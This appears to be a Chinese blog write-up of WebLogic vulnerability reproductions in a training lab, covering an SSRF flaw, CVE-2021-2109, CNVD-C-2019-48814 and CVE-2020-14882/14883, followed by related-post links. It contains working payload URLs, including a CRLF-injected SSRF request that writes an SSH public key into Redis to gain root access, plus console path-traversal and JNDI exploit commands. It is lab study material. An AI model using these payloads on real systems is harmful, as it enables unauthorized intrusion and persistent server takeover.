weblogic 漏洞复现

Weblogic ssrf

https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2017021014312200001

实验环境Weblogic服务器:centos6.5 weblogic版本10.3.6.0,IP 10.1.1.157
Redis服务器:centos6.5  redis-2.8.13, IP 10.1.1.111
host主机:kali IP随机

关闭防火墙

启动weblogic

这里有个坑

weblogic需要一直在后台挂着

访问http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1/xxx&rdoSearch=name&btnSubmit=Search

访问了/xxx目录

伪造http头

在http头中是用“\r\n”来分割header的,其中\r –> %0d、\n –> %0a,我们构造一个恶意的HOST头,如下:http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1/xxx%20HTTP/1.1%0d%0aHOST: www.baidu.com %0d%0aaas%0d%0a&rdoSearch=name&btnSubmit=Search

使用ssrf进行端口探测

访问http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&btnSubmit=Search

接收到了来自127.0.0.1:22的响应

说明22端口开启

尝试了所有:‘1’ 个地址,但无法通过 HTTP 连接到服务器

说明23端口未开启

利用ssrf写入ssh公钥

exp:http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.1.111:6379/hello%20HTTP/1.1%0d%0aset test "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClLfjZfhEz8i1Rg0iKNj3WGul+Vb0B7DK77uCYNxLrcTNT0kl+Chkeg2v2gpfCzuINm4nEwu0fznfoSlBtNhYpEgaiKDlKT3AAI6MyKFh5uIq332ihZ4kMO7NefvcMLbPL4XywgM/CnQc90YxDKHbEbjwZTgAzJsnRnCWfv4RzbV+Pq9agSUnURW8hWZ1lxAMFuOFmUBO4Ld5DCFQwUnS5YPJiYgjzks46DZT0n1onZIUh3XP601DGu2TPtuZLs43drjpVoFlOkXkQkFCYJTQQpe89lRl3xoi6lS8Bf+vdaQ5PnBBZDVYRm+NjRCCyWZDSSa5WiwvhcoGmpwl2eud/ root@K\n\n\n\n"%0d%0aconfig set dir /root/.ssh/%0d%0aconfig set dbfilename "authotrized_keys"%0d%0a%0d%0asave%0d%0aexit%0d%0asdsdd%0d%0a&rdoSearch=name&btnSubmit=Search

写入成功

CVE-2021-2109 WebLogic LDAP远程代码执行漏洞:

https://www.hetianlab.com/expc.do?ec=ECIDa2bb-83d8-4dbe-bc38-0423ce125df7

访问靶机 10.1.1.109:7001

访问/console/css/%252e%252e%252f/consolejndi.portal

新建一个jndi服务器

java -jar JNDIExploit.jar -i ip(攻击机地址)


反弹shell

burp不会用,∴复现失败

CNVD-C-2019-48814 WebLogic反序列化远程命令执行漏洞:

https://www.hetianlab.com/expc.do?ec=ECID3f28-5c9a-4f95-999d-68fa2fa7b7aa

async目录存在

如图,服务器开启了wls9_async_response组件,存在CNVD-C-2019-48814漏洞

反弹shell

使用burp抓包改包

响应出现202Accepted代表成功

成功反弹shell

使用脚本自动化反弹shell

上传webshell

抓包改包

202,成功

python脚本:

CVE-2020-14882&14883 weblogic未授权访问漏洞:

https://www.hetianlab.com/expc.do?ec=ECIDfdd4-97c8-4e32-89b7-df58dd102e4c

实验环境

靶机:docker+weblogic12.2.1.3  ip:10.1.1.109
攻击机:kali ip:10.1.1.110

查看是否存在控制台

http://IP:端口/console

漏洞urlhttp://IP:端口/console/css/%252E%252E%252Fconsole.portal

这里的%252E%252E%252F为…/的url二次编码

第一次访问可能会404

第二次就正常了

漏洞利用

注意:复制到分号即可

在http头处添加cmd:命令

weblogic漏洞复现相关推荐

  1. weblogic漏洞复现整理汇总(vulhub)

    weblogic漏洞复现整理汇总(vulhub) 目录 weblogic漏洞复现整理汇总(vulhub) 一.概述 二.任意文件上传漏洞(CVE-2018-2894) 三.XMLDecoder反序列化 ...

  2. weblogic漏洞复现(CVE-2020-2555)

    漏洞环境:fofa自己找,server=weblogic port=7001 一.漏洞简介 该反序列化的gadget存在与coherence包中.具体可以见分析 构造chain类似于common-co ...

  3. weblogic 漏洞复现

    cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录sudo service docker start //启动docker服务docker-compose up - ...

  4. [web攻防] weblogic 漏洞复现 CVE-2017-10271CVE-2018-2628CVE-2018-2894

    用docker复现weblogic的部分高危漏洞,主要是记录下一些操作,积累自己的知识储备.由于时间与个人水平原因,不对原理做过多叙述. 目录 环境打开方式 CVE-2017-10271 weblog ...

  5. Java安全-Java Vuls(Fastjson、Weblogic漏洞复现)

    复现几个 Java 的漏洞,文章会分多篇这是第一篇,文章会分组件和中间件两个角度进行漏洞复现 复现使用环境 Vulhub VulFocus 文章目录 组件 Fastjson 1.2.24 反序列化 R ...

  6. vulhub靶场-weblogic漏洞复现

    目录 weak-password CVE-2018-2894 SSRF(CVE-2014-4210) CVE-2020-14882&14883 CVE-2018-2628 CVE-2017-1 ...

  7. [Vulhub] Weblogic 漏洞复现

    文章目录 Weblogic 常规渗透测试环境 0x00 测试环境 0x01 弱口令 0x02 任意文件读取漏洞的利用 0x03 后台上传webshell Weblogic WLS Core Compo ...

  8. webLogic漏洞目录

    WebLogic漏洞复现与分析 1:webLogic漏洞列表 控制台路径泄露 Weakpassword SSRF: CVE-2014-4210 JAVA反序列化: CVE-2015-4852 CVE- ...

  9. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

最新文章

  1. 快讯 | 百度发布Apollo1.5 开放五大核心能力,未来3年花100亿投资100家公司
  2. Edraw Max(亿图图示)案例:产品经理如何用亿图绘制流程图?
  3. 脑电分析系列[MNE-Python-13]| bad通道介绍
  4. 姗姗来迟的Ubuntu版MX4,已经没了当年的初衷
  5. 在“软件工程:研究与实践”研讨会上关于UML Use-Case的开放空间讨论
  6. Linux系统下GitLab服务的的搭建
  7. 8321r 当前不允许登陆_Apache Shiro安全框架实现身份认证(登陆与登出)
  8. Ubuntu 中设置源的几种方法
  9. LeetCode 1180. 统计只含单一字母的子串
  10. linux 源码编译安装apache
  11. 微信小程序 地图功能的实现 map
  12. 末转变者登录服务器一直在排队,魔兽世界:国服神级服务器,排队持续两年,哈霍兰有何特别之处?...
  13. Machine Learning for Communication Networks
  14. aloha协议c语言实现,任务ALOHA协议的OPNET仿真.doc
  15. NOI2016 滚粗记
  16. Android打开系统自带文件管理器,全选菜单选项
  17. 基于C#+Oracle的模拟图书馆管理系统
  18. 论文解读: Exploiting Cloze Questions for Few Shot Text Classification and Natural Language Inference
  19. request java获取参数body_@RequestBody参数已经被读取,究竟是何原因?
  20. 【硬件】AD中在圆周外等间距放置器件

热门文章

  1. 多语言CMS诞生:逐浪CMS全民族语言与国际版全面启航,开启没有鸿沟的世界
  2. 编译型语言VS解释型语言
  3. aspera 下载ENA 数据报错Error: Client unable to connect to server (check UDP port and firewall
  4. 大模型新势力入局:IDEA研究院首席科学家创业,沈向洋院士任顾问,首轮估值20亿...
  5. Socket编写一个HTTP server程序(源码+运行效果)
  6. 世界最高33栋建筑全家福
  7. VCF电子海图投影文件的生成
  8. 神目推出3D结构光人脸识别模组
  9. 关于JSP的学习笔记整理
  10. 如何做一碗完美的葱油拌面?